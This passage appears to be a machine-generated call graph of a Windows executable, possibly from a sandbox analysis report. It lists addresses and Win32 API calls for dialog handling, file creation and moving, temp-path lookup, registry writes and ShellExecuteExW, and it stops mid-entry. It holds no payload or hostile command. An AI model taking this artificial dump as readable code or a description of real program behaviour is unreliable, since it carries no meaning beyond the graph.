29023->29024 29025 7ff6fe1b1900 _com_raise_error 14 API calls 29024->29025 29025->29024 26939 7ff6fe1b1278 26940 7ff6fe1b1900 _com_raise_error 14 API calls 26939->26940 26941 7ff6fe1b12b7 26940->26941 26941->26941 26948 7ff6fe1ab190 27291 7ff6fe18255c 26948->27291 26950 7ff6fe1ab1db 26951 7ff6fe1ab1ef 26950->26951 26952 7ff6fe1abe93 26950->26952 27001 7ff6fe1ab20c 26950->27001 26954 7ff6fe1ab1ff 26951->26954 26955 7ff6fe1ab2db 26951->26955 26951->27001 27570 7ff6fe1af390 26952->27570 26960 7ff6fe1ab2a9 26954->26960 26961 7ff6fe1ab207 26954->26961 26963 7ff6fe1ab391 26955->26963 26968 7ff6fe1ab2f5 26955->26968 26956 7ff6fe1b2320 _handle_error 8 API calls 26962 7ff6fe1ac350 26956->26962 26958 7ff6fe1abec9 26965 7ff6fe1abef0 GetDlgItem SendMessageW 26958->26965 26966 7ff6fe1abed5 SendDlgItemMessageW 26958->26966 26959 7ff6fe1abeba SendMessageW 26959->26958 26967 7ff6fe1ab2cb EndDialog 26960->26967 26960->27001 26971 7ff6fe19aae0 48 API calls 26961->26971 26961->27001 27299 7ff6fe1822bc GetDlgItem 26963->27299 26970 7ff6fe1962dc 35 API calls 26965->26970 26966->26965 26967->27001 26972 7ff6fe19aae0 48 API calls 26968->26972 26974 7ff6fe1abf47 GetDlgItem 26970->26974 26975 7ff6fe1ab236 26971->26975 26976 7ff6fe1ab313 SetDlgItemTextW 26972->26976 26973 7ff6fe1ab3b1 EndDialog 27151 7ff6fe1ab3da 26973->27151 27589 7ff6fe182520 26974->27589 27593 7ff6fe181ec4 34 API calls _handle_error 26975->27593 26980 7ff6fe1ab326 26976->26980 26979 7ff6fe1ab408 GetDlgItem 26984 7ff6fe1ab44f SetFocus 26979->26984 26985 7ff6fe1ab422 SendMessageW SendMessageW 26979->26985 26988 7ff6fe1ab340 GetMessageW 26980->26988 26980->27001 26983 7ff6fe1ab246 26987 7ff6fe1ab25c 26983->26987 26994 7ff6fe18250c SetDlgItemTextW 26983->26994 26989 7ff6fe1ab465 26984->26989 26990 7ff6fe1ab4f2 26984->26990 26985->26984 26987->27001 27007 7ff6fe1ac363 26987->27007 26996 7ff6fe1ab35e IsDialogMessageW 26988->26996 26988->27001 26997 7ff6fe19aae0 48 API calls 26989->26997 27313 7ff6fe188d04 26990->27313 26991 7ff6fe1abcc5 26998 7ff6fe19aae0 48 API calls 26991->26998 26992 7ff6fe181fa0 31 API calls 26992->27001 26994->26987 26996->26980 27002 7ff6fe1ab373 TranslateMessage DispatchMessageW 26996->27002 27003 7ff6fe1ab46f 26997->27003 27004 7ff6fe1abcd6 SetDlgItemTextW 26998->27004 27000 7ff6fe1ab52c 27323 7ff6fe1aef80 27000->27323 27001->26956 27002->26980 27013 7ff6fe18129c 33 API calls 27003->27013 27008 7ff6fe19aae0 48 API calls 27004->27008 27009 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27007->27009 27014 7ff6fe1abd08 27008->27014 27015 7ff6fe1ac368 27009->27015 27012 7ff6fe19aae0 48 API calls 27019 7ff6fe1ab555 27012->27019 27020 7ff6fe1ab498 27013->27020 27030 7ff6fe18129c 33 API calls 27014->27030 27025 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27015->27025 27022 7ff6fe19da98 48 API calls 27019->27022 27023 7ff6fe1af0a4 24 API calls 27020->27023 27028 7ff6fe1ab568 27022->27028 27029 7ff6fe1ab4a5 27023->27029 27032 7ff6fe1ac36e 27025->27032 27337 7ff6fe1af0a4 27028->27337 27029->27015 27044 7ff6fe1ab4e8 27029->27044 27037 7ff6fe1abd31 27030->27037 27043 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27032->27043 27041 7ff6fe1abdda 27037->27041 27071 7ff6fe18129c 33 API calls 27037->27071 27052 7ff6fe19aae0 48 API calls 27041->27052 27053 7ff6fe1ac374 27043->27053 27066 7ff6fe1ab5ec 27044->27066 27351 7ff6fe1afa80 27044->27351 27049 7ff6fe181fa0 31 API calls 27064 7ff6fe1ab586 27049->27064 27069 7ff6fe1abde4 27052->27069 27070 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27053->27070 27061 7ff6fe1ab61a 27364 7ff6fe192f58 27061->27364 27064->27032 27064->27044 27066->27061 27594 7ff6fe1932a8 27066->27594 27081 7ff6fe18129c 33 API calls 27069->27081 27075 7ff6fe1ac37a 27070->27075 27076 7ff6fe1abd7f 27071->27076 27083 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27075->27083 27085 7ff6fe19aae0 48 API calls 27076->27085 27079 7ff6fe1ab634 GetLastError 27080 7ff6fe1ab64c 27079->27080 27376 7ff6fe197fc4 27080->27376 27082 7ff6fe1abe0d 27081->27082 27097 7ff6fe18129c 33 API calls 27082->27097 27088 7ff6fe1ac380 27083->27088 27089 7ff6fe1abd8a 27085->27089 27087 7ff6fe1ab60e 27597 7ff6fe1a9d90 12 API calls _handle_error 27087->27597 27098 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27088->27098 27094 7ff6fe181150 33 API calls 27089->27094 27099 7ff6fe1abda2 27094->27099 27096 7ff6fe1ab65e 27101 7ff6fe1ab674 27096->27101 27102 7ff6fe1ab665 GetLastError 27096->27102 27104 7ff6fe1abe4e 27097->27104 27105 7ff6fe1ac386 27098->27105 27110 7ff6fe182034 33 API calls 27099->27110 27103 7ff6fe1ab71c 27101->27103 27107 7ff6fe1ab72b 27101->27107 27108 7ff6fe1ab68b GetTickCount 27101->27108 27102->27101 27103->27107 27123 7ff6fe1abb79 27103->27123 27116 7ff6fe181fa0 31 API calls 27104->27116 27109 7ff6fe18255c 61 API calls 27105->27109 27113 7ff6fe1aba50 27107->27113 27120 7ff6fe196454 34 API calls 27107->27120 27379 7ff6fe184228 27108->27379 27112 7ff6fe1ac3e4 27109->27112 27114 7ff6fe1abdbe 27110->27114 27117 7ff6fe1ac3e8 27112->27117 27126 7ff6fe1ac489 GetDlgItem SetFocus 27112->27126 27153 7ff6fe1ac3fd 27112->27153 27113->26973 27606 7ff6fe18bd0c 33 API calls 27113->27606 27121 7ff6fe181fa0 31 API calls 27114->27121 27124 7ff6fe1abe78 27116->27124 27132 7ff6fe1b2320 _handle_error 8 API calls 27117->27132 27127 7ff6fe1ab74e 27120->27127 27128 7ff6fe1abdcc 27121->27128 27138 7ff6fe19aae0 48 API calls 27123->27138 27130 7ff6fe181fa0 31 API calls 27124->27130 27125 7ff6fe1aba75 27607 7ff6fe181150 27125->27607 27136 7ff6fe1ac4ba 27126->27136 27598 7ff6fe19b914 102 API calls 27127->27598 27135 7ff6fe181fa0 31 API calls 27128->27135 27129 7ff6fe1ab6ba 27137 7ff6fe181fa0 31 API calls 27129->27137 27139 7ff6fe1abe83 27130->27139 27141 7ff6fe1aca97 27132->27141 27135->27041 27149 7ff6fe18129c 33 API calls 27136->27149 27143 7ff6fe1ab6c8 27137->27143 27144 7ff6fe1abba7 SetDlgItemTextW 27138->27144 27145 7ff6fe181fa0 31 API calls 27139->27145 27140 7ff6fe1aba8a 27146 7ff6fe19aae0 48 API calls 27140->27146 27142 7ff6fe1ab768 27148 7ff6fe19da98 48 API calls 27142->27148 27389 7ff6fe192134 27143->27389 27150 7ff6fe182534 27144->27150 27145->27151 27152 7ff6fe1aba97 27146->27152 27147 7ff6fe1ac434 SendDlgItemMessageW 27154 7ff6fe1ac454 27147->27154 27155 7ff6fe1ac45d EndDialog 27147->27155 27156 7ff6fe1ab7aa GetCommandLineW 27148->27156 27157 7ff6fe1ac4cc 27149->27157 27158 7ff6fe1abbc5 SetDlgItemTextW GetDlgItem 27150->27158 27151->26992 27159 7ff6fe181150 33 API calls 27152->27159 27153->27117 27153->27147 27154->27155 27155->27117 27160 7ff6fe1ab84f 27156->27160 27161 7ff6fe1ab869 27156->27161 27611 7ff6fe1980d8 33 API calls 27157->27611 27166 7ff6fe1abbf0 GetWindowLongPtrW SetWindowLongPtrW 27158->27166 27167 7ff6fe1abc13 27158->27167 27168 7ff6fe1abaaa 27159->27168 27180 7ff6fe1820b0 33 API calls 27160->27180 27599 7ff6fe1aab54 33 API calls _handle_error 27161->27599 27163 7ff6fe1ac4e0 27169 7ff6fe18250c SetDlgItemTextW 27163->27169 27166->27167 27405 7ff6fe1ace88 27167->27405 27173 7ff6fe181fa0 31 API calls 27168->27173 27174 7ff6fe1ac4f4 27169->27174 27170 7ff6fe1ab87a 27600 7ff6fe1aab54 33 API calls _handle_error 27170->27600 27179 7ff6fe1abab5 27173->27179 27185 7ff6fe1ac526 SendDlgItemMessageW FindFirstFileW 27174->27185 27176 7ff6fe1ab704 27182 7ff6fe19204c 100 API calls 27176->27182 27177 7ff6fe1ab6f5 GetLastError 27177->27176 27184 7ff6fe181fa0 31 API calls 27179->27184 27180->27161 27181 7ff6fe1ab88b 27601 7ff6fe1aab54 33 API calls _handle_error 27181->27601 27187 7ff6fe1ab711 27182->27187 27183 7ff6fe1ace88 162 API calls 27188 7ff6fe1abc3c 27183->27188 27189 7ff6fe1abac3 27184->27189 27190 7ff6fe1ac57b 27185->27190 27283 7ff6fe1aca04 27185->27283 27192 7ff6fe181fa0 31 API calls 27187->27192 27555 7ff6fe1af974 27188->27555 27199 7ff6fe19aae0 48 API calls 27189->27199 27200 7ff6fe19aae0 48 API calls 27190->27200 27191 7ff6fe1ab89c 27602 7ff6fe19b9b4 102 API calls 27191->27602 27192->27103 27196 7ff6fe1ab8b3 27603 7ff6fe1afbdc 33 API calls 27196->27603 27197 7ff6fe1aca81 27197->27117 27198 7ff6fe1ace88 162 API calls 27213 7ff6fe1abc6a 27198->27213 27203 7ff6fe1abadb 27199->27203 27204 7ff6fe1ac59e 27200->27204 27202 7ff6fe1acaa9 27206 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27202->27206 27214 7ff6fe18129c 33 API calls 27203->27214 27216 7ff6fe18129c 33 API calls 27204->27216 27205 7ff6fe1ab8d2 CreateFileMappingW 27208 7ff6fe1ab911 MapViewOfFile 27205->27208 27209 7ff6fe1ab953 ShellExecuteExW 27205->27209 27210 7ff6fe1acaae 27206->27210 27207 7ff6fe1abc96 27569 7ff6fe182298 GetDlgItem EnableWindow 27207->27569 27604 7ff6fe1b3640 27208->27604 27231 7ff6fe1ab974 27209->27231 27217 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27210->27217 27213->27207 27218 7ff6fe1ace88 162 API calls 27213->27218 27226 7ff6fe1abb04 27214->27226 27215 7ff6fe1ab3f5 27215->26973 27215->26991 27219 7ff6fe1ac5cd 27216->27219 27220 7ff6fe1acab4 27217->27220 27218->27207 27221 7ff6fe181150 33 API calls 27219->27221 27224 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27220->27224 27222 7ff6fe1ac5e8 27221->27222 27612 7ff6fe18e164 33 API calls 2 library calls 27222->27612 27223 7ff6fe1ab9c3 27232 7ff6fe1ab9ef 27223->27232 27233 7ff6fe1ab9dc UnmapViewOfFile CloseHandle 27223->27233 27229 7ff6fe1acaba 27224->27229 27225 7ff6fe1abb5a 27227 7ff6fe181fa0 31 API calls 27225->27227 27226->27075 27226->27225 27227->26973 27236 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27229->27236 27230 7ff6fe1ac5ff 27234 7ff6fe181fa0 31 API calls 27230->27234 27231->27223 27239 7ff6fe1ab9b1 Sleep 27231->27239 27232->27053 27235 7ff6fe1aba25 27232->27235 27233->27232 27238 7ff6fe1ac60c 27234->27238 27237 7ff6fe181fa0 31 API calls 27235->27237 27240 7ff6fe1acac0 27236->27240 27241 7ff6fe1aba42 27237->27241 27238->27210 27243 7ff6fe181fa0 31 API calls 27238->27243 27239->27223 27239->27231 27244 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27240->27244 27242 7ff6fe181fa0 31 API calls 27241->27242 27242->27113 27246 7ff6fe1ac673 27243->27246 27245 7ff6fe1acac6 27244->27245 27248 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27245->27248 27247 7ff6fe18250c SetDlgItemTextW 27246->27247 27249 7ff6fe1ac687 FindClose 27247->27249 27250 7ff6fe1acacc 27248->27250 27251 7ff6fe1ac6a3 27249->27251 27252 7ff6fe1ac797 SendDlgItemMessageW 27249->27252 27613 7ff6fe1aa2cc 10 API calls _handle_error 27251->27613 27253 7ff6fe1ac7cb 27252->27253 27257 7ff6fe19aae0 48 API calls 27253->27257 27255 7ff6fe1ac6c6 27256 7ff6fe19aae0 48 API calls 27255->27256 27258 7ff6fe1ac6cf 27256->27258 27259 7ff6fe1ac7d8 27257->27259 27260 7ff6fe19da98 48 API calls 27258->27260 27261 7ff6fe18129c 33 API calls 27259->27261 27264 7ff6fe1ac6ec memcpy_s 27260->27264 27263 7ff6fe1ac807 27261->27263 27262 7ff6fe181fa0 31 API calls 27265 7ff6fe1ac783 27262->27265 27266 7ff6fe181150 33 API calls 27263->27266 27264->27220 27264->27262 27267 7ff6fe18250c SetDlgItemTextW 27265->27267 27268 7ff6fe1ac822 27266->27268 27267->27252 27614 7ff6fe18e164 33 API calls 2 library calls 27268->27614 27270 7ff6fe1ac839 27271 7ff6fe181fa0 31 API calls 27270->27271 27272 7ff6fe1ac845 memcpy_s 27271->27272 27273 7ff6fe181fa0 31 API calls 27272->27273 27274 7ff6fe1ac87f 27273->27274 27275 7ff6fe181fa0 31 API calls 27274->27275 27276 7ff6fe1ac88c 27275->27276 27276->27229 27277 7ff6fe181fa0 31 API calls 27276->27277 27278 7ff6fe1ac8f3 27277->27278 27279 7ff6fe18250c SetDlgItemTextW 27278->27279 27280 7ff6fe1ac907 27279->27280 27280->27283 27615 7ff6fe1aa2cc 10 API calls _handle_error 27280->27615 27282 7ff6fe1ac932 27284 7ff6fe19aae0 48 API calls 27282->27284 27283->27117 27283->27197 27283->27202 27283->27245 27285 7ff6fe1ac93c 27284->27285 27286 7ff6fe19da98 48 API calls 27285->27286 27289 7ff6fe1ac959 memcpy_s 27286->27289 27287 7ff6fe181fa0 31 API calls 27288 7ff6fe1ac9f0 27287->27288 27290 7ff6fe18250c SetDlgItemTextW 27288->27290 27289->27240 27289->27287 27290->27283 27292 7ff6fe18256a 27291->27292 27293 7ff6fe1825d0 27291->27293 27292->27293 27616 7ff6fe19a4ac 27292->27616 27293->26950 27295 7ff6fe18258f 27295->27293 27296 7ff6fe1825a4 GetDlgItem 27295->27296 27296->27293 27297 7ff6fe1825b7 27296->27297 27297->27293 27298 7ff6fe1825be SetWindowTextW 27297->27298 27298->27293 27300 7ff6fe1822fc 27299->27300 27301 7ff6fe182334 27299->27301 27304 7ff6fe18129c 33 API calls 27300->27304 27665 7ff6fe1823f8 GetWindowTextLengthW 27301->27665 27303 7ff6fe18232a memcpy_s 27305 7ff6fe181fa0 31 API calls 27303->27305 27308 7ff6fe182389 27303->27308 27304->27303 27305->27308 27306 7ff6fe1823c8 27307 7ff6fe1b2320 _handle_error 8 API calls 27306->27307 27309 7ff6fe1823dd 27307->27309 27308->27306 27310 7ff6fe1823f0 27308->27310 27309->26973 27309->26979 27309->27215 27311 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27310->27311 27312 7ff6fe1823f5 27311->27312 27314 7ff6fe188d34 27313->27314 27315 7ff6fe188de8 27313->27315 27318 7ff6fe188d91 27314->27318 27319 7ff6fe188de3 27314->27319 27322 7ff6fe188d42 memcpy_s 27314->27322 27678 7ff6fe182004 33 API calls std::_Xinvalid_argument 27315->27678 27321 7ff6fe1b21d0 33 API calls 27318->27321 27318->27322 27677 7ff6fe181f80 33 API calls 3 library calls 27319->27677 27321->27322 27322->27000 27328 7ff6fe1aefb0 27323->27328 27324 7ff6fe1aefd7 27325 7ff6fe1b2320 _handle_error 8 API calls 27324->27325 27326 7ff6fe1ab537 27325->27326 27326->27012 27328->27324 27679 7ff6fe18bd0c 33 API calls 27328->27679 27329 7ff6fe1af02a 27330 7ff6fe181150 33 API calls 27329->27330 27331 7ff6fe1af03f 27330->27331 27332 7ff6fe181fa0 31 API calls 27331->27332 27335 7ff6fe1af04f memcpy_s 27331->27335 27332->27335 27333 7ff6fe181fa0 31 API calls 27334 7ff6fe1af076 27333->27334 27336 7ff6fe181fa0 31 API calls 27334->27336 27335->27333 27336->27324 27680 7ff6fe1aae1c PeekMessageW 27337->27680 27340 7ff6fe1af143 SendMessageW SendMessageW 27342 7ff6fe1af1a4 SendMessageW 27340->27342 27343 7ff6fe1af189 27340->27343 27341 7ff6fe1af0f5 27344 7ff6fe1af101 ShowWindow SendMessageW SendMessageW 27341->27344 27345 7ff6fe1af1c3 27342->27345 27346 7ff6fe1af1c6 SendMessageW SendMessageW 27342->27346 27343->27342 27344->27340 27345->27346 27347 7ff6fe1af1f3 SendMessageW 27346->27347 27348 7ff6fe1af218 SendMessageW 27346->27348 27347->27348 27349 7ff6fe1b2320 _handle_error 8 API calls 27348->27349 27350 7ff6fe1ab578 27349->27350 27350->27049 27352 7ff6fe1afbad 27351->27352 27353 7ff6fe1afab7 27351->27353 27354 7ff6fe1b2320 _handle_error 8 API calls 27352->27354 27353->27352 27685 7ff6fe1acdf8 27353->27685 27355 7ff6fe1afbbe 27354->27355 27355->27066 27358 7ff6fe1afb76 27358->27352 27361 7ff6fe1afbd3 27358->27361 27359 7ff6fe1afb2a RegSetValueExW RegCloseKey 27359->27358 27362 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27361->27362 27363 7ff6fe1afbd8 27362->27363 27366 7ff6fe19309d 27364->27366 27372 7ff6fe192f8e 27364->27372 27365 7ff6fe1b2320 _handle_error 8 API calls 27367 7ff6fe1930b3 27365->27367 27366->27365 27367->27079 27367->27080 27368 7ff6fe193077 27368->27366 27369 7ff6fe193684 56 API calls 27368->27369 27369->27366 27370 7ff6fe18129c 33 API calls 27370->27372 27372->27368 27372->27370 27373 7ff6fe1930c8 27372->27373 27689 7ff6fe193684 27372->27689 27374 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27373->27374 27375 7ff6fe1930cd 27374->27375 27377 7ff6fe197fcf 27376->27377 27378 7ff6fe197fd2 SetCurrentDirectoryW 27376->27378 27377->27378 27378->27096 27380 7ff6fe184255 27379->27380 27381 7ff6fe18129c 33 API calls 27380->27381 27382 7ff6fe18426a 27380->27382 27381->27382 27383 7ff6fe1b2320 _handle_error 8 API calls 27382->27383 27384 7ff6fe1842a1 27383->27384 27385 7ff6fe183c84 27384->27385 27386 7ff6fe183cab 27385->27386 27723 7ff6fe18710c 27386->27723 27388 7ff6fe183cbb memcpy_s 27388->27129 27391 7ff6fe19216a 27389->27391 27390 7ff6fe19219e 27393 7ff6fe196a0c 49 API calls 27390->27393 27401 7ff6fe19227f 27390->27401 27391->27390 27392 7ff6fe1921b1 CreateFileW 27391->27392 27392->27390 27395 7ff6fe192209 27393->27395 27394 7ff6fe1922af 27396 7ff6fe1b2320 _handle_error 8 API calls 27394->27396 27397 7ff6fe192246 27395->27397 27398 7ff6fe19220d CreateFileW 27395->27398 27400 7ff6fe1922c4 27396->27400 27397->27401 27402 7ff6fe1922d8 27397->27402 27398->27397 27399 7ff6fe1820b0 33 API calls 27399->27394 27400->27176 27400->27177 27401->27394 27401->27399 27403 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27402->27403 27404 7ff6fe1922dd 27403->27404 27735 7ff6fe1aaa08 27405->27735 27407 7ff6fe1ad1ee 27408 7ff6fe181fa0 31 API calls 27407->27408 27409 7ff6fe1ad1f7 27408->27409 27411 7ff6fe1b2320 _handle_error 8 API calls 27409->27411 27410 7ff6fe19d22c 33 API calls 27453 7ff6fe1acf03 memcpy_s 27410->27453 27412 7ff6fe1abc2b 27411->27412 27412->27183 27413 7ff6fe1aeefa 27894 7ff6fe18704c 47 API calls memcpy_s 27413->27894 27416 7ff6fe1aef00 27895 7ff6fe18704c 47 API calls memcpy_s 27416->27895 27418 7ff6fe1aef06 27422 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27418->27422 27420 7ff6fe1aeeee 27421 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27420->27421 27423 7ff6fe1aeef4 27421->27423 27425 7ff6fe1aef0c 27422->27425 27893 7ff6fe18704c 47 API calls memcpy_s 27423->27893 27427 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27425->27427 27429 7ff6fe1aef12 27427->27429 27428 7ff6fe1aee4a 27430 7ff6fe1aeed2 27428->27430 27431 7ff6fe1820b0 33 API calls 27428->27431 27434 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27429->27434 27891 7ff6fe181f80 33 API calls 3 library calls 27430->27891 27435 7ff6fe1aee77 27431->27435 27432 7ff6fe1aeee8 27892 7ff6fe182004 33 API calls std::_Xinvalid_argument 27432->27892 27433 7ff6fe1813a4 33 API calls 27436 7ff6fe1adc3a GetTempPathW 27433->27436 27438 7ff6fe1aef18 27434->27438 27890 7ff6fe1aabe8 33 API calls 3 library calls 27435->27890 27436->27453 27437 7ff6fe1962dc 35 API calls 27437->27453 27446 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27438->27446 27443 7ff6fe1aee8d 27451 7ff6fe181fa0 31 API calls 27443->27451 27456 7ff6fe1aeea4 memcpy_s 27443->27456 27444 7ff6fe182520 SetWindowTextW 27444->27453 27448 7ff6fe1aef1e 27446->27448 27447 7ff6fe1bbb8c 43 API calls 27447->27453 27458 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27448->27458 27450 7ff6fe1ae7f3 27450->27430 27450->27432 27455 7ff6fe1b21d0 33 API calls 27450->27455 27465 7ff6fe1ae83b memcpy_s 27450->27465 27451->27456 27452 7ff6fe181fa0 31 API calls 27452->27430 27453->27407 27453->27410 27453->27413 27453->27416 27453->27418 27453->27420 27453->27423 27453->27425 27453->27428 27453->27429 27453->27433 27453->27437 27453->27438 27453->27444 27453->27447 27453->27448 27453->27450 27454 7ff6fe182034 33 API calls 27453->27454 27459 7ff6fe1aaa08 33 API calls 27453->27459 27461 7ff6fe1aef24 27453->27461 27463 7ff6fe193f30 54 API calls 27453->27463 27473 7ff6fe1aef2a 27453->27473 27482 7ff6fe19dc2c 33 API calls 27453->27482 27484 7ff6fe1a99c8 31 API calls 27453->27484 27485 7ff6fe18e164 33 API calls 27453->27485 27487 7ff6fe193d34 51 API calls 27453->27487 27488 7ff6fe1aef30 27453->27488 27503 7ff6fe1aef36 27453->27503 27505 7ff6fe195b60 53 API calls 27453->27505 27506 7ff6fe1ad63c SendMessageW 27453->27506 27508 7ff6fe1aef3c 27453->27508 27516 7ff6fe1aef42 27453->27516 27519 7ff6fe188d04 33 API calls 27453->27519 27520 7ff6fe181744 33 API calls 27453->27520 27522 7ff6fe184228 33 API calls 27453->27522 27524 7ff6fe1932a8 51 API calls 27453->27524 27526 7ff6fe195820 33 API calls 27453->27526 27527 7ff6fe195aa8 33 API calls 27453->27527 27529 7ff6fe18250c SetDlgItemTextW 27453->27529 27532 7ff6fe197df4 47 API calls 27453->27532 27533 7ff6fe181150 33 API calls 27453->27533 27538 7ff6fe18129c 33 API calls 27453->27538 27540 7ff6fe182674 31 API calls 27453->27540 27542 7ff6fe1adf99 EndDialog 27453->27542 27544 7ff6fe1932bc 51 API calls 27453->27544 27547 7ff6fe1adb21 MoveFileW 27453->27547 27551 7ff6fe192f58 56 API calls 27453->27551 27552 7ff6fe1820b0 33 API calls 27453->27552 27554 7ff6fe181fa0 31 API calls 27453->27554 27739 7ff6fe1a13c4 CompareStringW 27453->27739 27740 7ff6fe1aa440 27453->27740 27778 7ff6fe197368 27453->27778 27794 7ff6fe194088 27453->27794 27836 7ff6fe19cfa4 35 API calls _invalid_parameter_noinfo_noreturn 27453->27836 27837 7ff6fe1a95b4 33 API calls Concurrency::cancel_current_task 27453->27837 27838 7ff6fe1b0684 31 API calls _invalid_parameter_noinfo_noreturn 27453->27838 27839 7ff6fe18df4c 47 API calls memcpy_s 27453->27839 27840 7ff6fe1aa834 27453->27840 27858 7ff6fe1a9518 33 API calls 27453->27858 27859 7ff6fe1aabe8 33 API calls 3 library calls 27453->27859 27860 7ff6fe1965b0 33 API calls 3 library calls 27453->27860 27861 7ff6fe1972cc 27453->27861 27865 7ff6fe1931bc 27453->27865 27879 7ff6fe193ea0 FindClose 27453->27879 27880 7ff6fe1a13f4 CompareStringW 27453->27880 27881 7ff6fe1a9cd0 47 API calls 27453->27881 27882 7ff6fe1a87d8 51 API calls 3 library calls 27453->27882 27883 7ff6fe1aab54 33 API calls _handle_error 27453->27883 27884 7ff6fe195b08 CompareStringW 27453->27884 27885 7ff6fe197eb0 47 API calls 27453->27885 27454->27453 27455->27465 27456->27452 27457 7ff6fe1aed40 27468 7ff6fe1aef72 27457->27468 27491 7ff6fe1aef78 27457->27491 27494 7ff6fe1aed3b memcpy_s 27457->27494 27499 7ff6fe1b21d0 33 API calls 27457->27499 27458->27461 27459->27453 27464 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27461->27464 27462 7ff6fe181fa0 31 API calls 27462->27428 27463->27453 27464->27473 27474 7ff6fe1820b0 33 API calls 27465->27474 27515 7ff6fe1aeb8f 27465->27515 27899 7ff6fe181f80 33 API calls 3 library calls 27468->27899 27470 7ff6fe1aec72 memcpy_s 27798 7ff6fe1af4e0 27470->27798 27471 7ff6fe1aec2a 27471->27470 27472 7ff6fe1aef66 27471->27472 27486 7ff6fe1aef6c 27471->27486 27471->27494 27497 7ff6fe1b21d0 33 API calls 27471->27497 27897 7ff6fe181f80 33 API calls 3 library calls 27472->27897 27477 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27473->27477 27478 7ff6fe1ae963 27474->27478 27477->27488 27489 7ff6fe1aef60 27478->27489 27496 7ff6fe18129c 33 API calls 27478->27496 27481 7ff6fe1ad5e9 GetDlgItem 27492 7ff6fe182520 SetWindowTextW 27481->27492 27482->27453 27484->27453 27485->27453 27898 7ff6fe182004 33 API calls std::_Xinvalid_argument 27486->27898 27487->27453 27500 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27488->27500 27896 7ff6fe18704c 47 API calls memcpy_s 27489->27896 27900 7ff6fe182004 33 API calls std::_Xinvalid_argument 27491->27900 27498 7ff6fe1ad608 SendMessageW 27492->27498 27494->27462 27501 7ff6fe1ae9a6 27496->27501 27497->27470 27498->27453 27499->27494 27500->27503 27886 7ff6fe19d22c 27501->27886 27507 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27503->27507 27505->27453 27506->27453 27507->27508 27512 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27508->27512 27512->27516 27514 7ff6fe1aef54 27518 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27514->27518 27515->27457 27515->27471 27515->27514 27517 7ff6fe1aef5a 27515->27517 27523 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27516->27523 27521 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27517->27521 27518->27517 27519->27453 27520->27453 27521->27489 27522->27453 27525 7ff6fe1aef48 27523->27525 27524->27453 27528 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27525->27528 27526->27453 27527->27453 27530 7ff6fe1aef4e 27528->27530 27529->27453 27534 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27530->27534 27532->27453 27533->27453 27534->27514 27535 7ff6fe1a13c4 CompareStringW 27545 7ff6fe1ae9d1 27535->27545 27537 7ff6fe181fa0 31 API calls 27537->27545 27538->27453 27539 7ff6fe18129c 33 API calls 27539->27545 27540->27453 27542->27453 27544->27453 27545->27515 27545->27525 27545->27530 27545->27535 27545->27537 27545->27539 27546 7ff6fe19d22c 33 API calls 27545->27546 27546->27545 27548 7ff6fe1adb70 27547->27548 27549 7ff6fe1adb55 MoveFileExW 27547->27549 27548->27453 27550 7ff6fe181fa0 31 API calls 27548->27550 27549->27548 27550->27548 27551->27453 27552->27453 27554->27453 27556 7ff6fe1af9a3 27555->27556 27557 7ff6fe1820b0 33 API calls 27556->27557 27559 7ff6fe1af9b9 27557->27559 27558 7ff6fe1af9ee 27911 7ff6fe18e34c 27558->27911 27559->27558 27560 7ff6fe1820b0 33 API calls 27559->27560 27560->27558 27562 7ff6fe1afa4b 27931 7ff6fe18e7a8 27562->27931 27566 7ff6fe1afa61 27567 7ff6fe1b2320 _handle_error 8 API calls 27566->27567 27568 7ff6fe1abc52 27567->27568 27568->27198 27571 7ff6fe1a849c 4 API calls 27570->27571 27572 7ff6fe1af3bf 27571->27572 27573 7ff6fe1af4b7 27572->27573 27574 7ff6fe1af3c7 GetWindow 27572->27574 27575 7ff6fe1b2320 _handle_error 8 API calls 27573->27575 27579 7ff6fe1af3e2 27574->27579 27576 7ff6fe1abe9b 27575->27576 27576->26958 27576->26959 27577 7ff6fe1af3ee GetClassNameW 28995 7ff6fe1a13c4 CompareStringW 27577->28995 27579->27573 27579->27577 27580 7ff6fe1af496 GetWindow 27579->27580 27581 7ff6fe1af417 GetWindowLongPtrW 27579->27581 27580->27573 27580->27579 27581->27580 27582 7ff6fe1af429 SendMessageW 27581->27582 27582->27580 27583 7ff6fe1af445 GetObjectW 27582->27583 28996 7ff6fe1a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27583->28996 27585 7ff6fe1a84cc 4 API calls 27586 